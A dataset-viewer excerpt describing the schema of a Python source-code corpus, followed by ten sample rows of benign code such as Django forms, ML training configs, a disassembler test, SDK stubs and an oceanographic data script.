Each row of this dataset describes one source file. The columns (ranges and cardinalities as reported by the dataset viewer; ⌀ marks nullable columns):

| column | dtype | range / cardinality |
|---|---|---|
| blob_id | string | length 40 |
| directory_id | string | length 40 |
| path | string | length 3–288 |
| content_id | string | length 40 |
| detected_licenses | list | length 0–112 |
| license_type | string | 2 classes |
| repo_name | string | length 5–115 |
| snapshot_id | string | length 40 |
| revision_id | string | length 40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 ⌀ | 4.92k – 681M |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] ⌀ | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] ⌀ | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | length 128 – 8.19k |
| authors | list | length 1 |
| author_id | string | length 1–132 |
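Rows with this schema can be streamed with the `datasets` library. A minimal sketch, assuming the data is hosted on the Hugging Face Hub under a hypothetical id `org/python-code-corpus` (substitute the real one):

```python
from datasets import load_dataset

# Hypothetical dataset id -- replace with the actual Hub id.
ds = load_dataset("org/python-code-corpus", split="train", streaming=True)

for row in ds.take(3):
    # Each row carries provenance (repo_name, path, revision_id) plus the file text.
    print(row["repo_name"], row["path"], row["length_bytes"])
    print(row["content"][:200])
```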
**Row 1 — `k-t-l-h/TableOfLife` · `/PyClient/TableOfLife/app/forms.py` · branch refs/heads/main**

- ids: blob 0640154e6d006f7e8cd5a8a84feb4397adea1e62 · directory 3dbb38734200935f143ea8b6446e9bf32a4a16ee · content 2f670b63694db308562266cdc27f51cebb639723 · snapshot 4624938a2edff3b5de336c30fec5775a5e3971cf · revision f0ceefe499b9a5a76b9f15201cbd409fa75f0605
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language C++ · src_encoding UTF-8 · extension py · length_bytes 1,125 · is_vendor false · is_generated false
- dates: visit 2023-05-14T09:39:37.406622 · revision 2021-06-03T19:35:43 · committer 2021-06-03T19:35:43 · gha_event_created_at 2023-02-17T18:58:24 · gha_created_at 2021-03-07T17:26:42
- github: id 345,408,827 · stars 0 · forks 2
- authors: ["you@example.com"] · author_id: you@example.com

content:

```python
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.contrib.auth.models import User
from django.core import validators
from django import forms
import re


class AskForm(forms.Form):
    classes = forms.CharField(label='О предметах:', widget=forms.Textarea(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Название предмета, Имя преподавателя, Количество студентов'}))
    students = forms.CharField(label='Выбор учеников:', widget=forms.Textarea(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Матрица оценок'}))
    settings = forms.CharField(label='Настройка (только для продвинутых): crossover, mutation, selector, creator', widget=forms.TextInput(
        attrs={'class': 'form-control', 'placeholder': 'Указывайте через запятую'}))


class PostForm(forms.Form):
    uuid = forms.CharField(label='Ваш UUID:', widget=forms.TextInput(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'UUID'}))
```
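A sketch of how such forms are typically consumed in a Django view — standard Django form handling, not code from this repo (`ask.html` and the import path are hypothetical):

```python
from django.shortcuts import render
from .forms import AskForm  # hypothetical app-relative import


def ask(request):
    form = AskForm(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        # cleaned_data keys mirror the field names declared on AskForm
        classes = form.cleaned_data['classes']
        students = form.cleaned_data['students']
        settings = form.cleaned_data['settings']
        # ... hand the parsed inputs to the scheduling backend ...
    return render(request, 'ask.html', {'form': form})
```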
**Row 2 — `Louis-Saglio/python_script` · `/HIDS/main.py` · branch refs/heads/master**

- ids: blob 4b019b306236babfdf442ed4b7f1e6d0ebb21614 · directory ae8a89e90b4d69a061076563ba68272d27e5c664 · content a75779d5ec65158a8c28c296ca08fbb8d7b57269 · snapshot 8d1a65f704c21eb3b2fee17e63b8d2b467764bb0 · revision f039e61078f5eb18d3334c4940d794fa5bc5f67d
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language Python · src_encoding UTF-8 · extension py · length_bytes 255 · is_vendor false · is_generated false
- dates: visit 2022-12-21T21:37:07.234976 · revision 2017-10-29T15:52:47 · committer 2017-10-29T15:52:47 · gha_event_created_at 2022-12-09T03:22:11 · gha_created_at 2017-10-14T21:11:03
- github: id 106,963,199 · stars 0 · forks 1
- authors: ["louis.saglio@sfr.fr"] · author_id: louis.saglio@sfr.fr

content:

```python
import filecmp
import os


def rlistdir(path='.'):
    for directory, sub_dir, files in os.walk(path):
        for file in files:
            yield os.path.join(directory, file)


if __name__ == '__main__':
    for i in rlistdir('/usr'):
        print(i)
```
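`rlistdir` is a thin generator over `os.walk`. For reference, the same traversal can be written with `pathlib` (equivalent modulo ordering and symlink handling):

```python
from pathlib import Path


def rlistdir_pathlib(path='.'):
    # rglob('*') recurses like os.walk; filter to plain files only
    for p in Path(path).rglob('*'):
        if p.is_file():
            yield str(p)
```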
**Row 3 — `hojihun5516/object-detection-level2-cv-02` · `/template/mmdetection/configs/foveabox/fovea_r50_fpn_4x4_1x_coco.py` · branch refs/heads/master**

- ids: blob bcfaee049701f0696da3a47ef641b699bbe4b7cd · directory c5f58af61e3577ded52acda210f4f664651b598c · content 2b00ad2faf61e2c437b5237d9de02049a81edf57 · snapshot 0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac · revision bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109
- license: detected ["Apache-2.0", "MIT", "LicenseRef-scancode-unknown-license-reference"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 1,528 · is_vendor false · is_generated false
- dates: visit 2023-08-31T09:50:59.150971 · revision 2021-10-16T15:00:19 · committer 2021-10-16T15:00:19 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["hojihun5516@daum.net"] · author_id: hojihun5516@daum.net

content:

```python
_base_ = ["../_base_/datasets/coco_detection.py", "../_base_/schedules/schedule_1x.py", "../_base_/default_runtime.py"]
# model settings
model = dict(
    type="FOVEA",
    backbone=dict(
        type="ResNet",
        depth=50,
        num_stages=4,
        out_indices=(0, 1, 2, 3),
        frozen_stages=1,
        norm_cfg=dict(type="BN", requires_grad=True),
        norm_eval=True,
        style="pytorch",
        init_cfg=dict(type="Pretrained", checkpoint="torchvision://resnet50"),
    ),
    neck=dict(
        type="FPN",
        in_channels=[256, 512, 1024, 2048],
        out_channels=256,
        start_level=1,
        num_outs=5,
        add_extra_convs="on_input",
    ),
    bbox_head=dict(
        type="FoveaHead",
        num_classes=80,
        in_channels=256,
        stacked_convs=4,
        feat_channels=256,
        strides=[8, 16, 32, 64, 128],
        base_edge_list=[16, 32, 64, 128, 256],
        scale_ranges=((1, 64), (32, 128), (64, 256), (128, 512), (256, 2048)),
        sigma=0.4,
        with_deform=False,
        loss_cls=dict(type="FocalLoss", use_sigmoid=True, gamma=1.50, alpha=0.4, loss_weight=1.0),
        loss_bbox=dict(type="SmoothL1Loss", beta=0.11, loss_weight=1.0),
    ),
    # training and testing settings
    train_cfg=dict(),
    test_cfg=dict(nms_pre=1000, score_thr=0.05, nms=dict(type="nms", iou_threshold=0.5), max_per_img=100),
)
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type="SGD", lr=0.01, momentum=0.9, weight_decay=0.0001)
```
**Row 4 — `459737087/mmflow` · `/tools/train.py` · branch refs/heads/master**

- ids: blob 6357de8a8bbeccf5484ff2c1b1e34b8452d63ff4 · directory 8a12d939f01a179c1fb8b7e72d8cb1c7d4970b6f · content ebc65480c5fc9610caee60b39c0eafdd4661cecf · snapshot bebd2da1bd87e9b5b2a1a10ecdc61558978610d9 · revision a32f7af12f1a0d2ae3f962f4c94a4a1680c7a19e
- license: detected ["Apache-2.0"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 6,433 · is_vendor false · is_generated false
- dates: visit 2023-09-03T03:04:40.010033 · revision 2021-11-18T04:35:06 · committer 2021-11-18T04:35:06 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["meowzheng@outlook.com"] · author_id: meowzheng@outlook.com

content:

```python
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time

import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import init_dist
from mmcv.utils import get_git_hash

from mmflow import __version__
from mmflow.apis import set_random_seed, train_model
from mmflow.datasets import build_dataset
from mmflow.models import build_flow_estimator
from mmflow.utils import collect_env, get_root_logger


def parse_args():
    parser = argparse.ArgumentParser(description='Train a flow estimator')
    parser.add_argument('config', help='train config file path')
    parser.add_argument('--work-dir', help='the dir to save logs and models')
    parser.add_argument(
        '--load-from', help='the checkpoint file to load weights from')
    parser.add_argument(
        '--resume-from', help='the checkpoint file to resume from')
    parser.add_argument(
        '--no-validate',
        action='store_true',
        help='whether not to evaluate the checkpoint during training')
    group_gpus = parser.add_mutually_exclusive_group()
    group_gpus.add_argument(
        '--gpus',
        type=int,
        help='number of gpus to use '
        '(only applicable to non-distributed training)')
    group_gpus.add_argument(
        '--gpu-ids',
        type=int,
        nargs='+',
        help='ids of gpus to use '
        '(only applicable to non-distributed training)')
    parser.add_argument('--seed', type=int, default=None, help='random seed')
    parser.add_argument(
        '--deterministic',
        action='store_true',
        help='whether to set deterministic options for CUDNN backend.')
    parser.add_argument(
        '--cfg-options',
        nargs='+',
        action=DictAction,
        help='override some settings in the used config, the key-value pair '
        'in xxx=yyy format will be merged into config file. If the value to '
        'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
        'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
        'Note that the quotation marks are necessary and that no white space '
        'is allowed.')
    parser.add_argument(
        '--launcher',
        choices=['none', 'pytorch', 'slurm', 'mpi'],
        default='none',
        help='job launcher')
    parser.add_argument('--local_rank', type=int, default=0)
    args = parser.parse_args()
    if 'LOCAL_RANK' not in os.environ:
        os.environ['LOCAL_RANK'] = str(args.local_rank)
    return args


def main():
    args = parse_args()

    cfg = Config.fromfile(args.config)
    if args.cfg_options is not None:
        cfg.merge_from_dict(args.cfg_options)
    # set cudnn_benchmark
    if cfg.get('cudnn_benchmark', False):
        torch.backends.cudnn.benchmark = True

    # work_dir is determined in this priority: CLI > config > default filename
    if args.work_dir is not None:
        # update configs according to CLI args if args.work_dir is not None
        cfg.work_dir = args.work_dir
    elif cfg.get('work_dir', None) is None:
        # use config filename as default work_dir if cfg.work_dir is None
        cfg.work_dir = osp.join('./work_dirs',
                                osp.splitext(osp.basename(args.config))[0])
    if args.load_from is not None:
        cfg.load_from = args.load_from
    if args.resume_from is not None:
        cfg.resume_from = args.resume_from
    if args.gpu_ids is not None:
        cfg.gpu_ids = args.gpu_ids
    else:
        cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)

    # init distributed env first, since logger depends on the dist info.
    if args.launcher == 'none':
        distributed = False
    else:
        distributed = True
        init_dist(args.launcher, **cfg.dist_params)

    # create work_dir
    mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
    # dump config
    cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
    # init the logger before other steps
    timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
    log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
    logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)

    # init the meta dict to record some important information such as
    # environment info and seed, which will be logged
    meta = dict()
    # log env info
    env_info_dict = collect_env()
    env_info = '\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])
    dash_line = '-' * 60 + '\n'
    logger.info('Environment info:\n' + dash_line + env_info + '\n' +
                dash_line)
    meta['env_info'] = env_info

    # log some basic info
    logger.info(f'Distributed training: {distributed}')
    logger.info(f'Config:\n{cfg.pretty_text}')

    # set random seeds
    if args.seed is not None:
        logger.info(f'Set random seed to {args.seed}, deterministic: '
                    f'{args.deterministic}')
        set_random_seed(args.seed, deterministic=args.deterministic)
    cfg.seed = args.seed
    meta['seed'] = args.seed
    meta['exp_name'] = osp.basename(args.config)

    model = build_flow_estimator(cfg.model)
    model.init_weights()
    logger.info(model)

    if cfg.data.train_dataloader.get('sample_ratio') is None:
        # build_dataset will concat the list of dataset
        # so there is one dataset in the list
        datasets = [build_dataset(cfg.data.train)]
    else:
        # the list of datasets is for Mixbatch
        datasets = [[build_dataset(c) for c in cfg.data.train]]
    if len(cfg.workflow) == 2:
        val_dataset = copy.deepcopy(cfg.data.val)
        val_dataset.pipeline = cfg.data.train.pipeline
        datasets.append(build_dataset(val_dataset))
    if cfg.checkpoint_config is not None:
        # save mmflow version, config file content and class names in
        # checkpoints as meta data
        cfg.checkpoint_config.meta = dict(
            mmflow_version=f'{__version__}+{get_git_hash()[:7]}',
            config=cfg.pretty_text)
    # add an attribute for visualization convenience
    datasets_size = 0
    for ds in datasets:
        datasets_size += len(ds)
    logger.info(f'dataset size {datasets_size}')
    train_model(
        model,
        datasets,
        cfg,
        distributed=distributed,
        validate=(not args.no_validate),
        timestamp=timestamp,
        meta=meta)


if __name__ == '__main__':
    main()
```
**Row 5 — `roiei/algo` · `/leet_code/18. 4Sum.py` · branch refs/heads/master**

- ids: blob 73575c45ed55b4146558350ddb50d28b66091187 · directory 8ef5a09d76a11c56963f18e6a08474a1a8bafe3c · content 972245f09f2573fa6cc14283b372bbd0b6f022b4 · snapshot 32c4677649c7666db148f6183fbfbf66c8b1969f · revision ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 1,124 · is_vendor false · is_generated false
- dates: visit 2022-04-01T19:21:27.768675 · revision 2022-02-19T06:15:29 · committer 2022-02-19T06:15:29 · gha_event_created_at null · gha_created_at null
- github: id 169,021,154 · stars 0 · forks 0
- authors: ["hyoukjea.son@hyundai.com"] · author_id: hyoukjea.son@hyundai.com

content (two small fixes over the original: the inner-loop variable no longer shadows the `sum` builtin, and the self-test compares sets of tuples — `fourSum` returns a set, so the original bare list comparison always printed False):

```python
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import bisect


class Solution:
    def fourSum(self, nums: [int], target: int) -> [[int]]:
        n = len(nums)
        res = set()
        nums.sort()
        for i in range(n - 2):
            for j in range(i + 1, n - 2):
                l = j + 1
                r = n - 1
                acc = nums[i] + nums[j]
                diff = target - acc
                while l < r:
                    s = nums[l] + nums[r]  # renamed from `sum`, which shadowed the builtin
                    if s == diff:
                        res.add((nums[i], nums[j], nums[l], nums[r],))
                        l += 1
                        r -= 1
                        continue
                    if s > diff:
                        r -= 1
                    elif s < diff:
                        l += 1
        return res


stime = time.time()
# compare as sets of tuples: fourSum returns a set, so comparing it to a
# list of lists would always be False
print(set(map(tuple, [
    [-1, 0, 0, 1],
    [-2, -1, 1, 2],
    [-2, 0, 0, 2]
])) == Solution().fourSum([1, 0, -1, 0, -2, 2], 0))
print('elapse time: {} sec'.format(time.time() - stime))
```
**Row 6 — `snowyxx/aliyun-python-demo` · `/aliyun/api/rest/Cdn20141111DescribeCdnMonitorDataRequest.py` · branch refs/heads/master**

- ids: blob e8f99e195a00a7eb686066deabd7198bdbd95ded · directory 0db97db08743783019efe022190f409d22ff95bd · content 589fb0bb77c88eb908d460a95e93610af5c76c7d · snapshot 8052e2a165f1b869affe632dda484d6ca203bd9b · revision ed40887ddff440b85b77f9b2a1fcda11cca55c8b
- license: detected ["Apache-2.0"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 398 · is_vendor false · is_generated false
- dates: visit 2021-01-10T03:37:31.657793 · revision 2016-01-21T02:03:14 · committer 2016-01-21T02:03:14 · gha_event_created_at null · gha_created_at null
- github: id 49,921,095 · stars 0 · forks 0
- authors: ["snowyxx@126.com"] · author_id: snowyxx@126.com

content:

```python
'''
Created by auto_sdk on 2014.11.27
'''
from aliyun.api.base import RestApi


class Cdn20141111DescribeCdnMonitorDataRequest(RestApi):
    def __init__(self, domain='cdn.aliyuncs.com', port=80):
        RestApi.__init__(self, domain, port)
        self.DomainName = None
        self.EndTime = None
        self.StartTime = None

    def getapiname(self):
        return 'cdn.aliyuncs.com.DescribeCdnMonitorData.2014-11-11'
```
**Row 7 — `0vercl0k/rp` · `/src/third_party/beaengine/tests/0fc0.py` · branch refs/heads/master**

- ids: blob 0f787c236ec1a8d885a4ef087fc082373227c8bc · directory 7f523c407d45d116860eff67f079e807f2b53339 · content 0ac3b3878d9ad1a76c66fa1cc72d3a95f77ed24d · snapshot a352c96bfe3715eb9ce8c5942831123e65289dac · revision b24e7f58a594aaf0ce3771745bf06862f6ecc074
- license: detected ["LGPL-3.0-only", "LGPL-2.0-or-later", "MIT"] · license_type permissive · gha_license_id MIT
- file: language Python · gha_language C++ · src_encoding UTF-8 · extension py · length_bytes 2,280 · is_vendor false · is_generated false
- dates: visit 2023-08-30T08:03:14.842828 · revision 2023-08-09T00:41:00 · committer 2023-08-09T00:41:00 · gha_event_created_at 2023-08-09T00:41:02 · gha_created_at 2012-02-26T19:26:33
- github: id 3,554,173 · stars 1,557 · forks 239
- authors: ["noreply@github.com"] · author_id: 0vercl0k.noreply@github.com

content:

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com

from headers.BeaEnginePython import *
from nose.tools import *


class TestSuite:
    def test(self):
        # 0F c0 /r
        # XADD r/m8, r8
        Buffer = bytes.fromhex('0fc09011223344')
        myDisasm = Disasm(Buffer)
        myDisasm.read()
        assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
        assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
        assert_equal(myDisasm.repr(), 'xadd byte ptr [rax+44332211h], dl')
        assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
        assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)

        # REX + 0F C0 /r
        # XADD r/m8*, r8*
        Buffer = bytes.fromhex('410fc09011223344')
        myDisasm = Disasm(Buffer)
        myDisasm.read()
        assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
        assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
        assert_equal(myDisasm.infos.Operand1.AccessMode, READ + WRITE)
        assert_equal(myDisasm.infos.Operand2.AccessMode, READ + WRITE)
        assert_equal(myDisasm.repr(), 'xadd byte ptr [r8+44332211h], dl')

        # if LOCK and destination is not memory
        Buffer = bytes.fromhex('f00fc0c011223344')
        myDisasm = Disasm(Buffer)
        myDisasm.read()
        assert_equal(hex(myDisasm.infos.Instruction.Opcode), '0xfc0')
        assert_equal(myDisasm.infos.Instruction.Mnemonic, b'xadd')
        assert_equal(myDisasm.repr(), 'lock xadd al, al')
        assert_equal(myDisasm.infos.Reserved_.ERROR_OPCODE, UD_)
```
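The expected disassembly in the first assertion can be checked by hand. A short sketch (plain Python, no BeaEngine required) decoding the ModRM byte `0x90` from the test buffer `0fc09011223344`:

```python
# 0f c0 = XADD r/m8, r8; 90 = ModRM byte; 11 22 33 44 = 32-bit displacement
modrm = 0x90
mod = modrm >> 6             # 0b10 -> operand is [base register + disp32]
reg = (modrm >> 3) & 0b111   # 2 -> dl for an 8-bit register operand
rm = modrm & 0b111           # 0 -> rax as the base register
disp32 = int.from_bytes(bytes.fromhex('11223344'), 'little')
print(mod, reg, rm, hex(disp32))  # 2 2 0 0x44332211
# -> 'xadd byte ptr [rax+44332211h], dl', matching the asserted repr
```

In the second test the `41` REX.B prefix extends `rm` from rax to r8, which is why the expected string becomes `xadd byte ptr [r8+44332211h], dl`.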
**Row 8 — `santarovich/botapi` · `/botapi/type_cast.py` · branch refs/heads/master**

- ids: blob 99987cf070bb316131b7d0ea14e3388a616f9a15 · directory 20be441085d9a9ae41dcf8e4dd5f416bcd3f22da · content ad3483bde31f98a71ed76a913e083021fa977960 · snapshot 928aaf48c44167b6893c51df738b9dc50873073a · revision dfb5161be08d0c045d70e023842144c4a18e012c
- license: detected ["Apache-2.0"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 3,052 · is_vendor false · is_generated false
- dates: visit 2023-03-16T10:51:00.997084 · revision 2020-12-22T09:33:44 · committer 2020-12-22T09:33:44 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["rineisky@gmail.com"] · author_id: rineisky@gmail.com

content:

```python
from datetime import datetime
from typing import Any

from .exceptions import TypeCastException
from .serialize import SerializableModel
from .types import TypedList, DateTime


def type_cast(func):
    def wrapper(var_name: str, value: Any, *args, **kwargs):
        if value is None:
            return None
        return func(var_name, value, *args, **kwargs)
    return wrapper


class TypeCast:
    @staticmethod
    @type_cast
    def cast(var_name: str, value: Any, var_type: Any = None, *args, **kwargs) -> Any:
        """
        Casts the value to the new_type. If new_type is TypedList, casts every
        item of value to item_type if item_type is not None

        :param var_name: name of the attribute (used to raise errors)
        :param value: value to cast
        :param var_type: desired type
        :return: casted value
        """
        if var_type is None or isinstance(value, var_type):
            return value
        elif issubclass(var_type, SerializableModel) and isinstance(value, dict):
            return var_type(**value)
        elif issubclass(var_type, datetime) and type(value) == str:
            return datetime.fromisoformat(value)
        else:
            raise TypeCastException(var_name, value, var_type)

    @staticmethod
    @type_cast
    def datetime_cast(var_name, value, date_format: str = None, *args, **kwargs):
        """Returns DateTime casted from value

        :param var_name: name of the attribute (used to raise errors)
        :param value: str or datetime object
        :param date_format: str with date format
        :return: DateTime
        """
        if type(value) == str:
            if date_format is None:
                result = DateTime.fromisoformat(value)
            else:
                result = DateTime.strptime(value, date_format)
        elif type(value) == DateTime:
            result = value
        elif isinstance(value, datetime):
            result = DateTime(
                value.year,
                value.month,
                value.day,
                value.hour,
                value.minute,
                value.second,
                value.microsecond,
                value.tzinfo
            )
        else:
            raise TypeCastException(var_name, value, DateTime)
        result.set_format(date_format=date_format)
        return result

    @staticmethod
    @type_cast
    def typed_list_cast(var_name, value, item_type=None, *args, **kwargs) -> TypedList:
        """Returns TypedList with type casted items

        :param var_name: name of the attribute (used to raise errors)
        :param value: iterable to cast
        :param item_type: type of EVERY item
        :return: TypedList
        """
        if item_type is None:
            return TypedList(value, None)
        elif issubclass(item_type, SerializableModel):
            return TypedList([
                TypeCast.cast(var_name, item, item_type) for item in value
            ], item_type)
        else:
            return TypedList(value, item_type)
```
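A minimal usage sketch. The `User` model below is hypothetical; it only assumes what the `var_type(**value)` branch implies, namely that `SerializableModel` subclasses accept their fields as keyword arguments:

```python
# Hypothetical model for illustration.
class User(SerializableModel):
    def __init__(self, id=None, name=None):
        self.id = id
        self.name = name


user = TypeCast.cast('user', {'id': 1, 'name': 'Ann'}, User)   # dict -> User
same = TypeCast.cast('user', user, User)                       # already a User: passed through
when = TypeCast.datetime_cast('when', '2020-12-22T09:33:44')   # ISO string -> DateTime
users = TypeCast.typed_list_cast('users', [{'id': 2}], User)   # list of dicts -> TypedList of User
```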
**Row 9 — `Tempah28/python-tdlib` · `/py_tdlib/constructors/stickers.py` · branch refs/heads/master**

- ids: blob f7503c9a867b753e4c09c2fade37efbef3ea46d8 · directory 9c73eccb0f27ee98452864e6388802e1c0a9e51c · content 4e1794bd2471db1a883cd9ab46fffe75f0da5e8d · snapshot 32a684cba6f5b8fcd5673d01a06f926304d29c5b · revision 925781f2ef9e386dab437334048c798fa9cb945f
- license: detected ["MIT"] · license_type permissive · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 1,549 · is_vendor false · is_generated false
- dates: visit 2020-03-31T00:16:06.943269 · revision 2018-10-05T14:16:12 · committer 2018-10-05T14:16:12 · gha_event_created_at null · gha_created_at null
- github: id null · stars 0 · forks 0
- authors: ["andrew@localhost"] · author_id: andrew@localhost

content (the doc comments are truncated in the generated source itself):

```python
from ..factory import Method, Type


class stickers(Type):
    # a list of stickers @stickers List of stickers
    stickers = None  # type: "vector<sticker>"


class getStickers(Method):
    # stickers from the installed sticker sets that correspond to
    # given emoji. If the emoji is not empty, favorite
    # recently used stickers may also be returned @emoji String
    # of emoji. If empty, returns all known installed stickers
    # Maximum number of stickers to be returned
    emoji = None  # type: "string"
    limit = None  # type: "int32"


class searchStickers(Method):
    # for stickers from public sticker sets that correspond to
    # given emoji @emoji String representation of emoji; must be
    # @limit Maximum number of stickers to be returned
    emoji = None  # type: "string"
    limit = None  # type: "int32"


class getRecentStickers(Method):
    # a list of recently used stickers @is_attached Pass true
    # return stickers and masks that were recently attached to
    # or video files; pass false to return recently sent
    is_attached = None  # type: "Bool"


class addRecentSticker(Method):
    # adds a new sticker to the list of recently
    # stickers. The new sticker is added to the top
    # the list. If the sticker was already in the
    # it is removed from the list first. Only stickers
    # to a sticker set can be added to this
    is_attached = None  # type: "Bool"
    sticker = None  # type: "InputFile"


class getFavoriteStickers(Method):
    # favorite stickers
    pass
```
**Row 10 — `ilebras/OSNAP` · `/DataProcessing_1418merged/CF1_merged_reconstruction.py` · branch refs/heads/master**

- ids: blob 159c3758b380920b7b9c253c437fa4ad4939b8f9 · directory e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 · content 207351cab222fb8c1799a14ab3f481dc095780f2 · snapshot dc7fba846f866ec64edab35a278d2ce6c86e5f97 · revision a5b22026351d2eb8dc4c89e2949be97122936d23
- license: detected [] · license_type no_license · gha_license_id null
- file: language Python · gha_language null · src_encoding UTF-8 · extension py · length_bytes 6,880 · is_vendor false · is_generated false
- dates: visit 2021-05-12T16:46:18.955345 · revision 2020-09-08T23:04:23 · committer 2020-09-08T23:04:23 · gha_event_created_at null · gha_created_at null
- github: id 117,025,921 · stars 0 · forks 0
- authors: ["isabela.lebras@gmail.com"] · author_id: isabela.lebras@gmail.com

content:

```python
from firstfuncs_1618 import *

dat16=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_2016recovery_dailymerged.nc')
dat16_recon=xr.open_dataset(datadir+'OSNAP2016recovery/mcat_nc/CF1_recon_2016recovery_dailymerged.nc')
dat18=xr.open_dataset(datadir+'OSNAP2018recovery/mcat_nc/CF1_2018recovery_dailymerged.nc')


def plot_overview(dat1,dat2):
    f,[ax1,ax2,ax3]=subplots(3,1,figsize=(12,15),sharex=True)
    ax1.plot(dat1.TIME,dat1.PRES)
    ax1.plot(dat2.TIME,dat2.PRES)
    ax1.invert_yaxis()
    ax1.set_ylabel('pressure [db]')
    ax2.plot(dat1.TIME,dat1.PTMP)
    ax2.plot(dat2.TIME,dat2.PTMP)
    ax2.set_ylabel('pot. temperature [$^\circ$C]')
    ax3.plot(dat1.TIME,dat1.PSAL)
    ax3.plot(dat2.TIME,dat2.PSAL)
    ax3.set_ylabel('practical salinity []')

plot_overview(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_overview_16recon_w18.png')


def TSplot(dat1,dat2):
    figure(figsize=(9,8))
    plot(dat1.PSAL,dat1.PTMP,'o',alpha=0.3)
    plot(dat2.PSAL,dat2.PTMP,'o',alpha=0.3)
    xlabel('practical salinity []')
    ylabel('pot. temperature [$^\circ$C]')

TSplot(dat16_recon,dat18)
savefig(figdir+'merging_overview/CF1_TS_16recon_w18.png')

#############################################################################
############ The first deployment reconstruction does not look bad,
####### Going to leave as is and try something similar for the second deployment
#############################################################################

# I actually only have to reconstruct the 50dbar data.

def plot_diff_manyways(axx,thediff,colch,labch):
    axx.plot(dat18.TIME,thediff,label='',alpha=0.5,color=colch)
    axx.plot(dat18.resample(TIME='1M').mean(dim='TIME').TIME,thediff.resample(TIME='1M').mean(dim='TIME'),'o-',color=colch,linewidth=3,label=labch)
    axx.axhline(mean(thediff),color=colch)

#############################################################################
############ Reconstruct using both instruments, see how well they agree
##### Use same method as first deployment: constant t offset, monthly s offset
#############################################################################

mtime=(dat18).resample(TIME='1M').mean(dim='TIME').TIME
sal_mdiff={}
sal_mdiff['from100']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=100)).resample(TIME='1M').mean(dim='TIME')
sal_mdiff['from200']=(dat18.PSAL.sel(DEPTH=50)-dat18.PSAL.sel(DEPTH=200)).resample(TIME='1M').mean(dim='TIME')

sal_mdiff_fill_100=linspace(sal_mdiff['from100'][8],sal_mdiff['from100'][0],5)
sal_mdiff_fill_200=linspace(sal_mdiff['from200'][8],sal_mdiff['from200'][0],5)

sal_mdiff_int={}
sal_mdiff_int['from100']=hstack((sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:9],sal_mdiff_fill_100[1:-1],sal_mdiff['from100'][:2]))
